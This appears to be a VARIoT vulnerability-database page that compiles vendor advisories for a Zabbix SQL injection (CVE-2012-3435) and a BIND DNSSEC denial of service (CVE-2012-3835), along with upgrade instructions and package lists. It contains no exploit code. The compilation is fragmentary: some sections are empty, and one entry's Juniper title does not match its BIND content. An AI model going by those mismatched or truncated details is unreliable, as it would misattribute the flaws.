VARIoT IoT vulnerabilities database
| VAR-201208-0374 | CVE-2012-3435 | ZABBIX 'itemid' parameter SQL injection vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in frontends/php/popup_bitem.php in Zabbix 1.8.15rc1 and earlier, and 2.x before 2.0.2rc1, allows remote attackers to execute arbitrary SQL commands via the itemid parameter. Zabbix is an enterprise-class open source solution that provides distributed system monitoring and network monitoring based on a web interface. ZABBIX is prone to an SQL-injection vulnerability.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to ZABBIX 2.0.2 are vulnerable. ----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Zabbix "itemid" SQL Injection Vulnerability
SECUNIA ADVISORY ID:
SA49809
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/49809/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=49809
RELEASE DATE:
2012-07-25
DISCUSS ADVISORY:
http://secunia.com/advisories/49809/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/49809/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=49809
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in Zabbix, which can be exploited
by malicious people to conduct SQL injection attacks. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
The vulnerability is reported in version 2.0.1.
SOLUTION:
Fixed in version 2.0.2rc2. Also fixed in the GIT repository.
PROVIDED AND/OR DISCOVERED BY:
muts
ORIGINAL ADVISORY:
Zabbix:
https://support.zabbix.com/browse/ZBX-5348
http://git.zabbixzone.com/zabbix2.0/.git/commit/333a3a5542ba8a2c901c24b7bf5440f41f1f4f54
muts:
http://www.exploit-db.com/exploits/20087/
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
For more information:
SA49809
SOLUTION:
Apply updated packages via the apt-get package manager. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -------------------------------------------------------------------------
Debian Security Advisory DSA-2539-1 security@debian.org
http://www.debian.org/security/ Raphael Geissert
September 06, 2012 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : zabbix
Vulnerability : SQL injection
Problem type : remote
Debian-specific: no
CVE ID : CVE-2012-3435
Debian Bug : 683273
It was discovered that Zabbix, a network monitoring solution, does not
properly validate user input used as a part of an SQL query.
For the testing distribution (wheezy), this problem will be fixed soon.
We recommend that you upgrade your zabbix packages.
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iEYEARECAAYFAlBIX7AACgkQYy49rUbZzlrfKwCdGUAYYsmuSFcaKKjgaap5PmSg
Yj4AoJ6SogKTB06ZEoEwxkCAhGv7XIvO
=lWI6
-----END PGP SIGNATURE-----
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201311-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Zabbix: Multiple vulnerabilities
Date: November 25, 2013
Bugs: #312875, #394497, #428372, #452878, #486696
ID: 201311-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Zabbix, possibly leading to
SQL injection attacks, Denial of Service, or information disclosure.
Background
==========
Zabbix is software for monitoring applications, networks, and servers.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-analyzer/zabbix < 2.0.9_rc1-r2 >= 2.0.9_rc1-r2
Description
===========
Multiple vulnerabilities have been discovered in Zabbix. Please review
the CVE identifiers referenced below for details.
Impact
======
A remote attacker may be able to execute arbitrary SQL statements,
cause a Denial of Service condition, or obtain sensitive information.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Zabbix users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=net-analyzer/zabbix-2.0.9_rc1-r2"
References
==========
[ 1 ] CVE-2010-1277
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1277
[ 2 ] CVE-2011-2904
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2904
[ 3 ] CVE-2011-3263
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3263
[ 4 ] CVE-2011-4674
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4674
[ 5 ] CVE-2012-3435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3435
[ 6 ] CVE-2013-1364
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1364
[ 7 ] CVE-2013-5572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5572
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201311-15.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201207-0279 | CVE-2012-3817 | Juniper Networks Junos Firewall bypasses denial of service vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
ISC BIND 9.4.x, 9.5.x, 9.6.x, and 9.7.x before 9.7.6-P2; 9.8.x before 9.8.3-P2; 9.9.x before 9.9.1-P2; and 9.6-ESV before 9.6-ESV-R7-P2, when DNSSEC validation is enabled, does not properly initialize the failing-query cache, which allows remote attackers to cause a denial of service (assertion failure and daemon exit) by sending many queries. Juniper Networks Juniper Junos is a network operating system dedicated to the company's hardware systems by Juniper Networks. The operating system provides a secure programming interface and the Junos SDK.
A remote denial of service vulnerability exists in Juniper Networks Junos. Attackers can use this vulnerability to exhaust session resources and deny legitimate users. ISC BIND is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause an assertion failure in the 'named' process, denying service to legitimate users. This issue may also be exploited to disclose certain memory information to clients.
The following versions are affected:
BIND 9.6-ESV-R1 through versions 9.6-ESV-R7-P1
BIND 9.7.1 through versions 9.7.6-P1
BIND 9.8.0 through versions 9.8.3-P1
BIND 9.9.0 through versions 9.9.1-P1. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=============================================================================
FreeBSD-SA-12:05.bind Security Advisory
The FreeBSD Project
Topic: named(8) DNSSEC validation Denial of Service
Category: contrib
Module: bind
Announced: 2012-08-06
Credits: Einar Lonn of IIS.se
Affects: All supported versions of FreeBSD
Corrected: 2012-08-06 21:33:11 UTC (RELENG_7, 7.4-STABLE)
2012-08-06 21:33:11 UTC (RELENG_7_4, 7.4-RELEASE-p10)
2012-07-24 19:04:35 UTC (RELENG_8, 8.3-STABLE)
2012-08-06 21:33:11 UTC (RELENG_8_3, 8.3-RELEASE-p4)
2012-08-06 21:33:11 UTC (RELENG_8_2, 8.2-RELEASE-p10)
2012-08-06 21:33:11 UTC (RELENG_8_1, 8.1-RELEASE-p13)
2012-07-24 22:32:03 UTC (RELENG_9, 9.1-PRERELEASE)
2012-08-06 21:33:11 UTC (RELENG_9_0, 9.0-RELEASE-p4)
CVE Name: CVE-2012-3817
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.
DNS Security Extensions (DNSSEC) provides data integrity, origin
authentication and authenticated denial of existence to resolvers.
II. Problem Description
BIND 9 stores a cache of query names that are known to be failing due
to misconfigured name servers or a broken chain of trust.
III.
IV. Workaround
No workaround is available, but systems not running the BIND resolving
name server with dnssec-validation enabled are not affected.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to 7-STABLE, 8-STABLE, or 9-STABLE,
or to the RELENG_7_4, RELENG_8_3, RELENG_8_2, RELENG_8_1, or RELENG_9_0
security branch dated after the correction date.
2) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to FreeBSD 7.4,
8.3, 8.2, 8.1 and 9.0 systems.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
# fetch http://security.FreeBSD.org/patches/SA-12:05/bind.patch
# fetch http://security.FreeBSD.org/patches/SA-12:05/bind.patch.asc
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/bind/dns
# make obj && make depend && make && make install
# cd /usr/src/usr.sbin/named
# make obj && make depend && make && make install
3) To update your vulnerable system via a binary patch:
Systems running 7.4-RELEASE, 8.3-RELEASE, 8.2-RELEASE, 8.1-RELEASE,
or 9.0-RELEASE on the i386 or amd64 platforms can be updated via the
freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
4) Install and run BIND from the Ports Collection after the correction
date. Correction details
The following list contains the revision numbers of each file that was
corrected in FreeBSD.
CVS:
Branch Revision
Path
- -------------------------------------------------------------------------
RELENG_7
src/contrib/bind9/lib/dns/resolver.c 1.1.1.9.2.11
RELENG_7_4
src/UPDATING 1.507.2.36.2.12
src/sys/conf/newvers.sh 1.72.2.18.2.15
src/contrib/bind9/lib/dns/resolver.c 1.1.1.9.2.8.2.1
RELENG_8
src/contrib/bind9/CHANGES 1.9.2.15
src/contrib/bind9/lib/dns/resolver.c 1.3.2.6
src/contrib/bind9/lib/dns/zone.c 1.6.2.10
src/contrib/bind9/lib/isc/random.c 1.2.2.4
src/contrib/bind9/version 1.9.2.15
RELENG_8_3
src/UPDATING 1.632.2.26.2.6
src/sys/conf/newvers.sh 1.83.2.15.2.8
src/contrib/bind9/lib/dns/resolver.c 1.6.2.7.2.1
RELENG_8_2
src/UPDATING 1.632.2.19.2.12
src/sys/conf/newvers.sh 1.83.2.12.2.15
src/contrib/bind9/lib/dns/resolver.c 1.6.2.4.2.1
RELENG_8_1
src/UPDATING 1.632.2.14.2.16
src/sys/conf/newvers.sh 1.83.2.10.2.17
src/contrib/bind9/lib/dns/resolver.c 1.6.2.3.2.1
RELENG_9
src/contrib/bind9/CHANGES 1.21.2.5
src/contrib/bind9/lib/dns/resolver.c 1.15.2.3
src/contrib/bind9/lib/dns/zone.c 1.7.2.3
src/contrib/bind9/version 1.21.2.5
RELENG_9_0
src/UPDATING 1.702.2.4.2.6
src/sys/conf/newvers.sh 1.95.2.4.2.8
src/contrib/bind9/lib/dns/resolver.c 1.15.4.1
- -------------------------------------------------------------------------
Subversion:
Branch/path Revision
- -------------------------------------------------------------------------
stable/7/ r239108
releng/7.4/ r239108
stable/8/ r238749
releng/8.3/ r239108
releng/8.2/ r239108
releng/8.1/ r239108
stable/9/ r238756
releng/9.0/ r239108
- -------------------------------------------------------------------------
VII.
Here are the details from the Slackware 14.0 ChangeLog:
+--------------------------+
patches/packages/bind-9.9.2_P1-i486-1_slack14.0.txz: Upgraded.
IMPORTANT NOTE: This package updates BIND from 9.7.6_P4 to
9.8.4_P1 since the 9.7 series is no longer supported. It is
possible that some changes may be required to your local
configuration.
This release addresses some denial-of-service and other bugs.
For more information, see:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5688
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5166
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3817
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1667
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3868
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 12.1:
ftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/bind-9.8.4_P1-i486-1_slack12.1.tgz
Updated package for Slackware 12.2:
ftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/bind-9.8.4_P1-i486-1_slack12.2.tgz
Updated package for Slackware 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bind-9.8.4_P1-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bind-9.8.4_P1-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bind-9.8.4_P1-i486-1_slack13.1.txz
Updated package for Slackware x86_64 13.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bind-9.8.4_P1-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bind-9.8.4_P1-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bind-9.8.4_P1-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bind-9.9.2_P1-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bind-9.9.2_P1-x86_64-1_slack14.0.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.9.2_P1-i486-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.9.2_P1-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 12.1 package:
2df945fd92d480df98711992180cdd70 bind-9.8.4_P1-i486-1_slack12.1.tgz
Slackware 12.2 package:
ddf762702befde00ab86cda1a5766bbd bind-9.8.4_P1-i486-1_slack12.2.tgz
Slackware 13.0 package:
b6c9a8f1262bd39db2dd77034f58e568 bind-9.8.4_P1-i486-1_slack13.0.txz
Slackware x86_64 13.0 package:
b35c20ad9778035c7e04ef2944375608 bind-9.8.4_P1-x86_64-1_slack13.0.txz
Slackware 13.1 package:
a6b061aeb84003ea7b6ddcc157e0db65 bind-9.8.4_P1-i486-1_slack13.1.txz
Slackware x86_64 13.1 package:
54ee26b4924ab502eedfd024d83db20e bind-9.8.4_P1-x86_64-1_slack13.1.txz
Slackware 13.37 package:
04d40ede0a96160e79767bf995469773 bind-9.8.4_P1-i486-1_slack13.37.txz
Slackware x86_64 13.37 package:
f4635df06e3c0f62f035d00e15b0f5fb bind-9.8.4_P1-x86_64-1_slack13.37.txz
Slackware 14.0 package:
66612ea03941fc8ef5ef21409ecc6fe3 bind-9.9.2_P1-i486-1_slack14.0.txz
Slackware x86_64 14.0 package:
6f664fe7e955c0dbe806a63ad9212c00 bind-9.9.2_P1-x86_64-1_slack14.0.txz
Slackware -current package:
83bc10ca67bede66bf742a7d0ab6e628 n/bind-9.9.2_P1-i486-1.txz
Slackware x86_64 -current package:
4a539dd88ef3637eee56693c037a3dc8 n/bind-9.9.2_P1-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg bind-9.9.2_P1-i486-1_slack14.0.txz
Then, restart the name server:
# /etc/rc.d/rc.bind restart
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address.
For the stable distribution (squeeze), this problem has been fixed in
version 1:9.7.3.dfsg-1~squeeze6.
For the testing distribution (wheezy), this problem will be fixed soon.
For the unstable distribution (sid), this problem has been fixed in
version 1:9.8.1.dfsg.P1-4.2. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: bind security update
Advisory ID: RHSA-2012:1123-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-1123.html
Issue date: 2012-07-31
CVE Names: CVE-2012-3817
=====================================================================
1. Summary:
Updated bind packages that fix one security issue are now available for
Red Hat Enterprise Linux 5 and 6.
The Red Hat Security Response Team has rated this update as having
important security impact. A Common Vulnerability Scoring System (CVSS)
base score, which gives a detailed severity rating, is available from the
CVE link in the References section.
2. Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. Description:
The Berkeley Internet Name Domain (BIND) is an implementation of the Domain
Name System (DNS) protocols. BIND includes a DNS server (named); a resolver
library (routines for applications to use when interfacing with DNS); and
tools for verifying that the DNS server is operating correctly.
An uninitialized data structure use flaw was found in BIND when DNSSEC
validation was enabled. (CVE-2012-3817)
Users of bind are advised to upgrade to these updated packages, which
correct this issue. After installing the update, the BIND daemon (named)
will be restarted automatically.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
842897 - CVE-2012-3817 bind: heavy DNSSEC validation load can cause assertion failure
6. Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/bind-9.3.6-20.P1.el5_8.2.src.rpm
i386:
bind-9.3.6-20.P1.el5_8.2.i386.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.i386.rpm
bind-libs-9.3.6-20.P1.el5_8.2.i386.rpm
bind-sdb-9.3.6-20.P1.el5_8.2.i386.rpm
bind-utils-9.3.6-20.P1.el5_8.2.i386.rpm
x86_64:
bind-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.i386.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-libs-9.3.6-20.P1.el5_8.2.i386.rpm
bind-libs-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-sdb-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-utils-9.3.6-20.P1.el5_8.2.x86_64.rpm
RHEL Desktop Workstation (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/bind-9.3.6-20.P1.el5_8.2.src.rpm
i386:
bind-chroot-9.3.6-20.P1.el5_8.2.i386.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.i386.rpm
bind-devel-9.3.6-20.P1.el5_8.2.i386.rpm
bind-libbind-devel-9.3.6-20.P1.el5_8.2.i386.rpm
caching-nameserver-9.3.6-20.P1.el5_8.2.i386.rpm
x86_64:
bind-chroot-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.i386.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-devel-9.3.6-20.P1.el5_8.2.i386.rpm
bind-devel-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-libbind-devel-9.3.6-20.P1.el5_8.2.i386.rpm
bind-libbind-devel-9.3.6-20.P1.el5_8.2.x86_64.rpm
caching-nameserver-9.3.6-20.P1.el5_8.2.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/bind-9.3.6-20.P1.el5_8.2.src.rpm
i386:
bind-9.3.6-20.P1.el5_8.2.i386.rpm
bind-chroot-9.3.6-20.P1.el5_8.2.i386.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.i386.rpm
bind-devel-9.3.6-20.P1.el5_8.2.i386.rpm
bind-libbind-devel-9.3.6-20.P1.el5_8.2.i386.rpm
bind-libs-9.3.6-20.P1.el5_8.2.i386.rpm
bind-sdb-9.3.6-20.P1.el5_8.2.i386.rpm
bind-utils-9.3.6-20.P1.el5_8.2.i386.rpm
caching-nameserver-9.3.6-20.P1.el5_8.2.i386.rpm
ia64:
bind-9.3.6-20.P1.el5_8.2.ia64.rpm
bind-chroot-9.3.6-20.P1.el5_8.2.ia64.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.i386.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.ia64.rpm
bind-devel-9.3.6-20.P1.el5_8.2.ia64.rpm
bind-libbind-devel-9.3.6-20.P1.el5_8.2.ia64.rpm
bind-libs-9.3.6-20.P1.el5_8.2.i386.rpm
bind-libs-9.3.6-20.P1.el5_8.2.ia64.rpm
bind-sdb-9.3.6-20.P1.el5_8.2.ia64.rpm
bind-utils-9.3.6-20.P1.el5_8.2.ia64.rpm
caching-nameserver-9.3.6-20.P1.el5_8.2.ia64.rpm
ppc:
bind-9.3.6-20.P1.el5_8.2.ppc.rpm
bind-chroot-9.3.6-20.P1.el5_8.2.ppc.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.ppc.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.ppc64.rpm
bind-devel-9.3.6-20.P1.el5_8.2.ppc.rpm
bind-devel-9.3.6-20.P1.el5_8.2.ppc64.rpm
bind-libbind-devel-9.3.6-20.P1.el5_8.2.ppc.rpm
bind-libbind-devel-9.3.6-20.P1.el5_8.2.ppc64.rpm
bind-libs-9.3.6-20.P1.el5_8.2.ppc.rpm
bind-libs-9.3.6-20.P1.el5_8.2.ppc64.rpm
bind-sdb-9.3.6-20.P1.el5_8.2.ppc.rpm
bind-utils-9.3.6-20.P1.el5_8.2.ppc.rpm
caching-nameserver-9.3.6-20.P1.el5_8.2.ppc.rpm
s390x:
bind-9.3.6-20.P1.el5_8.2.s390x.rpm
bind-chroot-9.3.6-20.P1.el5_8.2.s390x.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.s390.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.s390x.rpm
bind-devel-9.3.6-20.P1.el5_8.2.s390.rpm
bind-devel-9.3.6-20.P1.el5_8.2.s390x.rpm
bind-libbind-devel-9.3.6-20.P1.el5_8.2.s390.rpm
bind-libbind-devel-9.3.6-20.P1.el5_8.2.s390x.rpm
bind-libs-9.3.6-20.P1.el5_8.2.s390.rpm
bind-libs-9.3.6-20.P1.el5_8.2.s390x.rpm
bind-sdb-9.3.6-20.P1.el5_8.2.s390x.rpm
bind-utils-9.3.6-20.P1.el5_8.2.s390x.rpm
caching-nameserver-9.3.6-20.P1.el5_8.2.s390x.rpm
x86_64:
bind-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-chroot-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.i386.rpm
bind-debuginfo-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-devel-9.3.6-20.P1.el5_8.2.i386.rpm
bind-devel-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-libbind-devel-9.3.6-20.P1.el5_8.2.i386.rpm
bind-libbind-devel-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-libs-9.3.6-20.P1.el5_8.2.i386.rpm
bind-libs-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-sdb-9.3.6-20.P1.el5_8.2.x86_64.rpm
bind-utils-9.3.6-20.P1.el5_8.2.x86_64.rpm
caching-nameserver-9.3.6-20.P1.el5_8.2.x86_64.rpm
Red Hat Enterprise Linux Desktop (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/bind-9.8.2-0.10.rc1.el6_3.2.src.rpm
i386:
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-utils-9.8.2-0.10.rc1.el6_3.2.i686.rpm
x86_64:
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-utils-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/bind-9.8.2-0.10.rc1.el6_3.2.src.rpm
i386:
bind-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-chroot-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-sdb-9.8.2-0.10.rc1.el6_3.2.i686.rpm
x86_64:
bind-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-chroot-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-sdb-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/bind-9.8.2-0.10.rc1.el6_3.2.src.rpm
x86_64:
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-utils-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/bind-9.8.2-0.10.rc1.el6_3.2.src.rpm
x86_64:
bind-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-chroot-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-devel-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
bind-sdb-9.8.2-0.10.rc1.el6_3.2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/bind-9.8.2-0.10.rc1.el6_3.2.src.rpm
i386:
bind-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-chroot-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-debuginfo-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-libs-9.8.2-0.10.rc1.el6_3.2.i686.rpm
bind-utils-9.8.2-0.10.rc1.el6_3.2.i686.rpm
ppc64:
